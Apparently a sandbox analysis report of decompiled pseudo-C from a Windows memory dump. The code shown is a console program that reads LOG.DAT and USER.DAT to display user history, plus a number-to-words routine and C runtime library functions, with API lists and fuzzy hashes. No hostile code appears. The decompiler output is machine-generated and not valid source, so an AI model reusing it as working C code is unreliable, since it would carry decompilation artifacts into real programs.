                                                									memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                									_t435 = _t435 + 0xc;
                                                									_t397 = _t421 + 0x22;
                                                									asm("movsb");
                                                									L63:
                                                									_t283 = 1 +  *(_t433 - 8);
                                                									__eflags = _t283;
                                                									 *(_t433 - 8) = _t283;
                                                								}
                                                							}
                                                							L66:
                                                							__eflags =  *(_t433 - 0x1c) -  *(_t433 - 0x14);
                                                							if( *(_t433 - 0x1c) >  *(_t433 - 0x14)) {
                                                								 *(_t433 - 0x1c) = 0;
                                                							}
                                                							L68:
                                                							 *(_t433 - 8) =  *(_t433 - 0x1c);
                                                							 *(_t433 - 0xc) = 0;
                                                							L69:
                                                							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                							if(__eflags < 0) {
                                                							}
                                                							goto L75;
                                                						}
                                                						L82:
                                                						_t249 =  *((char*)(_t433 - 1));
                                                						__eflags = _t249 - 0x73;
                                                						if(__eflags == 0) {
                                                							goto L50;
                                                						}
                                                						L83:
                                                						_t322 =  *((char*)(_t433 - 1));
                                                						__eflags =  *((char*)(_t433 - 1)) - 0x20;
                                                						if(__eflags == 0) {
                                                							goto L50;
                                                						}
                                                						L84:
                                                						while(1) {
                                                							L86:
                                                							__eflags = 1;
                                                							if(1 == 0) {
                                                								break;
                                                							}
                                                							L1:
                                                							 *(_t433 - 8) = 0;
                                                							 *(_t433 - 0x28) = 0;
                                                							 *(_t433 - 0x1c) = 0;
                                                							 *(_t433 - 0x34) = 0;
                                                							_t218 = E01236EF1("LOG.DAT", "r");
                                                							_t436 = _t435 + 8;
                                                							 *0x1252f20 = _t218;
                                                							while(1) {
                                                								L2:
                                                								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x3b +  *(_t433 - 8) * 0x45);
                                                								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x31 +  *(_t433 - 8) * 0x45);
                                                								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x22 +  *(_t433 - 8) * 0x45);
                                                								_t320 =  *0x1252f20; // 0x0
                                                								_t228 = E01237021(_t320, "%s %s %s %s\n",  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)));
                                                								_t437 = _t436 + 0x18;
                                                								if(_t228 == 0xffffffff) {
                                                									break;
                                                								}
                                                								L3:
                                                								_t307 = E01236EF1("USER.DAT", "r");
                                                								_t450 = _t437 + 8;
                                                								 *0x1252f28 = _t307;
                                                								while(1) {
                                                									L4:
                                                									_push(_t433 - 0x78);
                                                									_push(_t433 - 0x58);
                                                									_t394 =  *0x1252f28; // 0x0
                                                									_t309 = E01237021(_t394, "%s %s %s\n", _t433 - 0x38);
                                                									_t451 = _t450 + 0x14;
                                                									if(_t309 == 0xffffffff) {
                                                										break;
                                                									}
                                                									L5:
                                                									_t313 = E01238230( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)), _t433 - 0x38);
                                                									_t450 = _t451 + 8;
                                                									if(_t313 == 0) {
                                                										 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                									}
                                                								}
                                                								L8:
                                                								_t310 =  *0x1252f28; // 0x0
                                                								_push(_t310);
                                                								E01236DB6(_t314, _t397, _t421, __eflags);
                                                								_t436 = _t451 + 4;
                                                							}
                                                							L9:
                                                							 *(_t433 - 0x30) =  *(_t433 - 8);
                                                							_t364 =  *0x1252f20; // 0x0
                                                							_push(_t364);
                                                							E01236DB6(_t314, _t397, _t421, __eflags);
                                                							E012320E0( *(_t433 - 8), _t397, _t421, __eflags, _t457);
                                                							E012312B0(0x1e, 8);
                                                							_push("1. View by USER NAME");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							E012312B0(0x1e, 0xa);
                                                							_push("2. View by DATE");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							E012312B0(0x1e, 0xc);
                                                							_push("3. View ALL User history");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							E012312B0(0x1e, 0xe);
                                                							_push("4. Return to main menu");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							_t442 = _t437 + 0x14;
                                                							E012312B0(1, 0xf);
                                                							 *(_t433 - 8) = 0;
                                                							while(1) {
                                                								L11:
                                                								__eflags =  *(_t433 - 8) - 0x4e;
                                                								if(__eflags >= 0) {
                                                									break;
                                                								}
                                                								L12:
                                                								_push("_");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t442 = _t442 + 4;
                                                								_t306 = 1 +  *(_t433 - 8);
                                                								__eflags = _t306;
                                                								 *(_t433 - 8) = _t306;
                                                							}
                                                							L13:
                                                							E012312B0(0x17, 0x11);
                                                							_push(" Press a number between the range [1 -4]  ");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							_t443 = _t442 + 4;
                                                							 *(_t433 - 0xc) = 0;
                                                							_t322 =  *(_t433 - 0xc);
                                                							 *((char*)(_t433 - 2)) =  *(_t433 - 0xc);
                                                							E012320E0( *(_t433 - 0xc), _t397, _t421, __eflags, _t457);
                                                							 *(_t433 - 0x20) =  *((char*)(_t433 - 2));
                                                							 *(_t433 - 0x20) =  *(_t433 - 0x20) - 1;
                                                							__eflags =  *(_t433 - 0x20) - 3;
                                                							if(__eflags > 0) {
                                                								L38:
                                                								E012320E0(_t322, _t397, _t421, __eflags, _t457);
                                                								E012312B0(0xa, 0xa);
                                                								_push("Your input is out of range! Enter a choice between 1 to 4!");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								E012312B0(0xf, 0xc);
                                                								_push("Press ENTER to return to main menu...");
                                                								_t249 = E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t435 = _t443 + 8;
                                                								 *(_t433 - 0x28) = 1;
                                                								goto L39;
                                                							} else {
                                                								L14:
                                                								switch( *((intOrPtr*)( *(_t433 - 0x20) * 4 +  &M012335F8))) {
                                                									case 0:
                                                										L15:
                                                										E012312B0(0x1e, 0xa);
                                                										_push("Enter user name : ");
                                                										E0123715C(_t314, _t397, _t421, __eflags);
                                                										_t365 = _t433 - 0x58;
                                                										_t249 = E0123738B(" %s", _t433 - 0x58);
                                                										_t435 = _t443 + 0xc;
                                                										 *(_t433 - 8) = 0;
                                                										while(1) {
                                                											L17:
                                                											__eflags =  *(_t433 - 8) -  *(_t433 - 0x30);
                                                											if( *(_t433 - 8) >=  *(_t433 - 0x30)) {
                                                												break;
                                                											}
                                                											L18:
                                                											_t365 =  *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45;
                                                											_t299 = E01238230( *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45, _t433 - 0x58);
                                                											_t435 = _t435 + 8;
                                                											__eflags = _t299;
                                                											if(_t299 == 0) {
                                                												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18));
                                                												memcpy( *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                												_t435 = _t435 + 0xc;
                                                												_t397 = _t421 + 0x22;
                                                												asm("movsb");
                                                												_t303 = 1 +  *(_t433 - 0xc);
                                                												__eflags = _t303;
                                                												 *(_t433 - 0xc) = _t303;
                                                											}
                                                											_t249 = 1 +  *(_t433 - 8);
                                                											__eflags = _t249;
                                                											 *(_t433 - 8) = _t249;
                                                										}
                                                										L21:
                                                										_t322 =  *(_t433 - 0xc);
                                                										 *(_t433 - 0x14) =  *(_t433 - 0xc);
                                                										goto L39;
                                                									case 1:
                                                										do {
                                                											L22:
                                                											__eax = E012312B0(0x1e, 0xa);
                                                											_push("Enter Date (dd/mm/yyyy) : ");
                                                											__eax = E0123715C(__ebx, __edi, __esi, __eflags);
                                                											__esp = __esp + 4;
                                                											__edx = __ebp - 0x58;
                                                											E0123738B(" %s", __ebp - 0x58) = __ebp - 0x58;
                                                											__eflags = E01231E60(__eflags, __ebp - 0x58);
                                                											if(__eflags == 0) {
                                                												__eax = E01231500(__edi, __esi, 0x1e, 0xa, 0x46, 0xa);
                                                												_push(0x124f8b0);
                                                												__eax = E0123715C(__ebx, __edi, __esi, __eflags);
                                                												__esp = __esp + 4;
                                                											}
                                                											__ecx = __ebp - 0x58;
                                                											__eflags = E01231E60(__eflags, __ebp - 0x58);
                                                										} while (__eflags == 0);
                                                										__edx = __ebp - 0x58;
                                                										_push(__ebp - 0x58);
                                                										__eax = E012315D0();
                                                										 *(__ebp - 8) = 0;
                                                										 *(__ebp - 0xc) = 0;
                                                										while(1) {
                                                											L27:
                                                											__ecx =  *(__ebp - 8);
                                                											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
                                                											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
                                                												break;
                                                											}
                                                											L28:
                                                											__edx = __ebp - 0x58;
                                                											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                											__ecx =  *(__ebp - 0x18);
                                                											__edx =  *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45;
                                                											__eax = E01238230( *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45, __ebp - 0x58);
                                                											__eflags = __eax;
                                                											if(__eax == 0) {
                                                												 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                												__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
                                                												__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
                                                												__ecx = 0x11;
                                                												__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
                                                												__edi = __esi + __ecx;
                                                												__edi = __esi + __ecx + __ecx;
                                                												__ecx = 0;
                                                												asm("movsb");
                                                												__eax =  *(__ebp - 0xc);
                                                												__eax = 1 +  *(__ebp - 0xc);
                                                												__eflags = __eax;
                                                												 *(__ebp - 0xc) = __eax;
                                                											}
                                                											__eax =  *(__ebp - 8);
                                                											__eax = 1 +  *(__ebp - 8);
                                                											__eflags = __eax;
                                                											 *(__ebp - 8) = __eax;
                                                										}
                                                										L31:
                                                										__ecx =  *(__ebp - 0xc);
                                                										 *(__ebp - 0x14) = __ecx;
                                                										goto L39;
                                                									case 2:
                                                										L32:
                                                										 *(__ebp - 8) = 0;
                                                										while(1) {
                                                											L34:
                                                											__eax =  *(__ebp - 8);
                                                											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
                                                											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
                                                												break;
                                                											}
                                                											L35:
                                                											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                											__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
                                                											__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
                                                											__ecx = 0x11;
                                                											__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
                                                											__edi = __esi + __ecx;
                                                											__edi = __esi + __ecx + __ecx;
                                                											__ecx = 0;
                                                											asm("movsb");
                                                											__ecx =  *(__ebp - 0xc);
                                                											__ecx = 1 +  *(__ebp - 0xc);
                                                											 *(__ebp - 0xc) = __ecx;
                                                											__edx =  *(__ebp - 8);
                                                											__edx = 1 +  *(__ebp - 8);
                                                											__eflags = __edx;
                                                											 *(__ebp - 8) = __edx;
                                                										}
                                                										L36:
                                                										__edx =  *(__ebp - 0xc);
                                                										 *(__ebp - 0x14) =  *(__ebp - 0xc);
                                                										L39:
                                                										__eflags =  *(_t433 - 0x14);
                                                										if(__eflags == 0) {
                                                											E012320E0(_t322, _t397, _t421, __eflags, _t457);
                                                											E012312B0(0x1b, 0xc);
                                                											_push(0x124f918);
                                                											E0123715C(_t314, _t397, _t421, __eflags);
                                                											_t435 = _t435 + 4;
                                                											_t249 = E01232E80(_t314, _t365, __eflags, _t457);
                                                										}
                                                										__eflags =  *(_t433 - 0x28);
                                                										if( *(_t433 - 0x28) != 0) {
                                                											L85:
                                                											 *(_t433 - 0x28) = 0;
                                                										} else {
                                                											L42:
                                                											 *(_t433 - 8) = 0;
                                                											 *(_t433 - 0xc) =  *(_t433 - 0x14) - 1;
                                                											while(1) {
                                                												L44:
                                                												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                												if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
                                                													break;
                                                												}
                                                												L45:
                                                												_t421 =  *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
                                                												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
                                                												_t435 = _t435 + 0xc;
                                                												_t397 = _t421 + 0x22;
                                                												asm("movsb");
                                                												_t322 = 1 +  *(_t433 - 8);
                                                												 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                												_t391 =  *(_t433 - 0xc) - 1;
                                                												__eflags = _t391;
                                                												 *(_t433 - 0xc) = _t391;
                                                											}
                                                											L46:
                                                											 *(_t433 - 8) = 0;
                                                											while(1) {
                                                												L48:
                                                												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                												if(__eflags >= 0) {
                                                													goto L50;
                                                												}
                                                												L49:
                                                												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
                                                												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                												_t435 = _t435 + 0xc;
                                                												_t397 = _t421 + 0x22;
                                                												asm("movsb");
                                                												L47:
                                                												_t322 = 1 +  *(_t433 - 8);
                                                												__eflags = _t322;
                                                												 *(_t433 - 8) = _t322;
                                                											}
                                                											goto L50;
                                                										}
                                                										goto L86;
                                                									case 3:
                                                										L37:
                                                										goto L87;
                                                								}
                                                							}
                                                							break;
                                                						}
                                                						L87:
                                                						return _t249;
                                                						L88:
                                                					}
                                                				}
                                                			}


































                                                APIs
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 012334B3
                                                • _wprintf.LIBCMT ref: 01233560
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$ConsoleCursorHandlePosition
                                                • String ID: %d.$%s%s%s%s
                                                • API String ID: 3459578117-4028964860
                                                • Opcode ID: 35bfc59a491c3d1461725748e18d34aace066e60186c68588ac93b7c2777ad19
                                                • Instruction ID: 0ce7d7aad8782f8f870fb39d6a6a73441fda7a7f3df5374d2e50e912b325e93b
                                                • Opcode Fuzzy Hash: 35bfc59a491c3d1461725748e18d34aace066e60186c68588ac93b7c2777ad19
                                                • Instruction Fuzzy Hash: E3415EB1E1404BAFCF18CB88D5D1ABEBBB6FBD5304F558199D101AB285DA309A45CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E01241673(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				char _v8;
                                                				intOrPtr _v12;
                                                				signed int _v20;
                                                				void* __edi;
                                                				signed int _t35;
                                                				int _t38;
                                                				intOrPtr* _t44;
                                                				int _t47;
                                                				short* _t49;
                                                				intOrPtr _t50;
                                                				intOrPtr _t54;
                                                				int _t55;
                                                				void* _t57;
                                                				signed int _t59;
                                                				char* _t62;
                                                
                                                				_t62 = _a8;
                                                				if(_t62 == 0) {
                                                					L5:
                                                					return 0;
                                                				}
                                                				_t50 = _a12;
                                                				if(_t50 == 0) {
                                                					goto L5;
                                                				}
                                                				if( *_t62 != 0) {
                                                					_push(_t57);
                                                					E01237857( &_v20, _t57, _a16);
                                                					_t35 = _v20;
                                                					__eflags =  *(_t35 + 0xa8);
                                                					if( *(_t35 + 0xa8) != 0) {
                                                						_t38 = E0124124B( *_t62 & 0x000000ff,  &_v20);
                                                						__eflags = _t38;
                                                						if(_t38 == 0) {
                                                							__eflags = _a4;
                                                							_t59 = 1;
                                                							_t28 = _v20 + 4; // 0x20432f41
                                                							__eflags = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                							if(__eflags != 0) {
                                                								L21:
                                                								__eflags = _v8;
                                                								if(_v8 != 0) {
                                                									_t54 = _v12;
                                                									_t31 = _t54 + 0x70;
                                                									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                									__eflags =  *_t31;
                                                								}
                                                								return _t59;
                                                							}
                                                							L20:
                                                							_t44 = E01238EFF(__eflags);
                                                							_t59 = _t59 | 0xffffffff;
                                                							__eflags = _t59;
                                                							 *_t44 = 0x2a;
                                                							goto L21;
                                                						}
                                                						_t59 = _v20;
                                                						__eflags =  *(_t59 + 0x74) - 1;
                                                						if( *(_t59 + 0x74) <= 1) {
                                                							L15:
                                                							_t20 = _t59 + 0x74; // 0x3a202020
                                                							__eflags = _t50 -  *_t20;
                                                							L16:
                                                							if(__eflags < 0) {
                                                								goto L20;
                                                							}
                                                							__eflags = _t62[1];
                                                							if(__eflags == 0) {
                                                								goto L20;
                                                							}
                                                							L18:
                                                							_t22 = _t59 + 0x74; // 0x3a202020
                                                							_t59 =  *_t22;
                                                							goto L21;
                                                						}
                                                						_t12 = _t59 + 0x74; // 0x3a202020
                                                						__eflags = _t50 -  *_t12;
                                                						if(__eflags < 0) {
                                                							goto L16;
                                                						}
                                                						__eflags = _a4;
                                                						_t17 = _t59 + 0x74; // 0x3a202020
                                                						_t18 = _t59 + 4; // 0x20432f41
                                                						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                                                						_t59 = _v20;
                                                						__eflags = _t47;
                                                						if(_t47 != 0) {
                                                							goto L18;
                                                						}
                                                						goto L15;
                                                					}
                                                					_t55 = _a4;
                                                					__eflags = _t55;
                                                					if(_t55 != 0) {
                                                						 *_t55 =  *_t62 & 0x000000ff;
                                                					}
                                                					_t59 = 1;
                                                					goto L21;
                                                				}
                                                				_t49 = _a4;
                                                				if(_t49 != 0) {
                                                					 *_t49 = 0;
                                                				}
                                                				goto L5;
                                                			}



















                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 012416A7
                                                • __isleadbyte_l.LIBCMT ref: 012416D5
                                                • MultiByteToWideChar.KERNEL32(20432F41,00000009,?,3A202020,00000000,00000000,?,00000000,?,?,0124FF04,?,00000000), ref: 01241703
                                                • MultiByteToWideChar.KERNEL32(20432F41,00000009,?,00000001,00000000,00000000,?,00000000,?,?,0124FF04,?,00000000), ref: 01241739
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: 4ea13e41c4326518021bdc160fdea954d8357356850a0f07fd6c8b73935f2dd7
                                                • Instruction ID: ce199ebaf941c399e275516d9836581e1e6676c0bfd5b2e6bcbeabcea774ca07
                                                • Opcode Fuzzy Hash: 4ea13e41c4326518021bdc160fdea954d8357356850a0f07fd6c8b73935f2dd7
                                                • Instruction Fuzzy Hash: 8D31A431620217AFDB2EDE78C845B7A7FB5FF41250F194418E66487190D770F4A1DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0123ECB1(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                				intOrPtr _t25;
                                                				void* _t26;
                                                
                                                				_t25 = _a16;
                                                				if(_t25 == 0x65 || _t25 == 0x45) {
                                                					_t26 = E0123F1FE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                					goto L9;
                                                				} else {
                                                					_t35 = _t25 - 0x66;
                                                					if(_t25 != 0x66) {
                                                						__eflags = _t25 - 0x61;
                                                						if(_t25 == 0x61) {
                                                							L7:
                                                							_t26 = E0123ED37(_a4, _a8, _a12, _a20, _a24, _a28);
                                                						} else {
                                                							__eflags = _t25 - 0x41;
                                                							if(__eflags == 0) {
                                                								goto L7;
                                                							} else {
                                                								_t26 = E0123F473(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                							}
                                                						}
                                                						L9:
                                                						return _t26;
                                                					} else {
                                                						return E0123F3B4(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                                                					}
                                                				}
                                                			}






                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                • String ID:
                                                • API String ID: 3016257755-0
                                                • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                • Instruction ID: bc1ba196169972caf36ed79b812752295c6241e0107106cc27b9a04a67d3bfea
                                                • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                • Instruction Fuzzy Hash: E8014CB246014EFBCF125F88DC45CEE3F26BB99254B5A8815FF1858130D336C9B5AB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0123CC10(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				LONG* _t20;
                                                				signed int _t25;
                                                				void* _t31;
                                                				LONG* _t33;
                                                				void* _t34;
                                                				void* _t35;
                                                
                                                				_t35 = __eflags;
                                                				_t29 = __edx;
                                                				_t24 = __ebx;
                                                				_push(0xc);
                                                				_push(0x124d9a0);
                                                				E01239160(__ebx, __edi, __esi);
                                                				_t31 = E0123D59F(__edx, __edi, _t35);
                                                				_t25 =  *0x1251c6c; // 0xfffffffe
                                                				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                					E0123BE5F(0xd);
                                                					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                					_t33 =  *(_t31 + 0x68);
                                                					 *(_t34 - 0x1c) = _t33;
                                                					__eflags = _t33 -  *0x1251524; // 0xa64750
                                                					if(__eflags != 0) {
                                                						__eflags = _t33;
                                                						if(__eflags != 0) {
                                                							__eflags = InterlockedDecrement(_t33);
                                                							if(__eflags == 0) {
                                                								__eflags = _t33 - 0x1251820;
                                                								if(__eflags != 0) {
                                                									E01238F53(_t33);
                                                								}
                                                							}
                                                						}
                                                						_t20 =  *0x1251524; // 0xa64750
                                                						 *(_t31 + 0x68) = _t20;
                                                						_t33 =  *0x1251524; // 0xa64750
                                                						 *(_t34 - 0x1c) = _t33;
                                                						InterlockedIncrement(_t33);
                                                					}
                                                					 *(_t34 - 4) = 0xfffffffe;
                                                					E0123CCAC();
                                                				} else {
                                                					_t33 =  *(_t31 + 0x68);
                                                				}
                                                				_t38 = _t33;
                                                				if(_t33 == 0) {
                                                					E0123751F(_t24, _t29, _t31, _t33, _t38, 0x20);
                                                				}
                                                				return E012391A5(_t33);
                                                			}










                                                APIs
                                                  • Part of subcall function 0123D59F: __getptd_noexit.LIBCMT ref: 0123D5A0
                                                • __lock.LIBCMT ref: 0123CC4D
                                                • InterlockedDecrement.KERNEL32(?), ref: 0123CC6A
                                                • _free.LIBCMT ref: 0123CC7D
                                                • InterlockedIncrement.KERNEL32(00A64750), ref: 0123CC95
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                • String ID:
                                                • API String ID: 2704283638-0
                                                • Opcode ID: 0883352c0a925fba824aecee48a8a3fa1e3832efe549e7a585efaf45a44da2d9
                                                • Instruction ID: 099c9ac3995efe6e602a3e31623a3be9aead9fa77135d7cb14737d78d3cbcf89
                                                • Opcode Fuzzy Hash: 0883352c0a925fba824aecee48a8a3fa1e3832efe549e7a585efaf45a44da2d9
                                                • Instruction Fuzzy Hash: 4D01D6B6A20B139BDB3AAF6DB0483AD77A0BFC4710F04440ADA1477280CB349961CFD5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E01231B30(intOrPtr _a12) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				char _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				char _v45;
                                                				short _v47;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v63;
                                                				char _v64;
                                                				intOrPtr _v68;
                                                				char _v71;
                                                				char _v75;
                                                				char _v79;
                                                				char _v80;
                                                				char _v92;
                                                				char _v167;
                                                				char _v168;
                                                				signed int _t163;
                                                				signed int _t177;
                                                				signed int _t178;
                                                				void* _t186;
                                                				intOrPtr _t189;
                                                				void* _t292;
                                                				void* _t293;
                                                				void* _t294;
                                                
                                                				_v64 = 0;
                                                				_v63 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v45 = 0;
                                                				_v80 = 0;
                                                				_v79 = 0;
                                                				_v75 = 0;
                                                				_v71 = 0;
                                                				_v168 = 0;
                                                				_t163 = E012387A0( &_v167, 0, 0x31);
                                                				_t294 = _t293 + 0xc;
                                                				asm("cvttsd2si eax, [ebp+0x8]");
                                                				_v16 = _t163;
                                                				asm("cdq");
                                                				 *(_t292 + 0xffffffffffffffa4) = _v16 % 0x3e8;
                                                				asm("cdq");
                                                				_v16 = _v16 / 0x3e8;
                                                				_v8 = 4;
                                                				while(_v8 >= 0) {
                                                					asm("cdq");
                                                					 *(_t292 + _v8 * 4 - 0x70) = _v16 % 0x64;
                                                					asm("cdq");
                                                					_v16 = _v16 / 0x64;
                                                					_v8 = _v8 - 1;
                                                				}
                                                				_v36 =  *(_t292 + 0xffffffffffffffa4);
                                                				asm("cdq");
                                                				_v20 = _v36 / 0x64;
                                                				asm("cdq");
                                                				_v12 = _v36 % 0x64;
                                                				asm("cdq");
                                                				_v40 = _v12 / 0xa;
                                                				_t177 = _v12;
                                                				asm("cdq");
                                                				_t178 = _t177 / 0xa;
                                                				_v44 = _t177 % 0xa;
                                                				if(_v12 >= 0x14 || _v20 == 0) {
                                                					if(_v12 >= 0x14 || _v20 != 0) {
                                                						if(_v12 <= 0x14 || _v20 == 0) {
                                                							E01231E50(_t178, _v40,  &_v92);
                                                							E01231E40( &_v32, _v44,  &_v32);
                                                							E01238140( &_v64,  &_v32);
                                                							_t294 = _t294 + 8;
                                                						} else {
                                                							E01231E40(_v20, _v20,  &_v32);
                                                							E01238140( &_v64, "Hundred ");
                                                							E01231E50(_v40, _v40,  &_v92);
                                                							E01238140( &_v64,  &_v92);
                                                							E01231E40( &_v32, _v44,  &_v32);
                                                							E01238140( &_v64,  &_v32);
                                                							_t294 = _t294 + 0x18;
                                                						}
                                                					} else {
                                                						E01231E40( &_v32, _v12,  &_v32);
                                                					}
                                                				} else {
                                                					E01231E40(_v20, _v20,  &_v32);
                                                					E01238140( &_v64, "Hundred ");
                                                					E01231E40(_v12, _v12,  &_v32);
                                                					E01238140( &_v64,  &_v32);
                                                					_t294 = _t294 + 0x10;
                                                				}
                                                				_v8 = 4;
                                                				while(_v8 >= 0) {
                                                					if( *(_t292 + _v8 * 4 - 0x70) >= 0x14) {
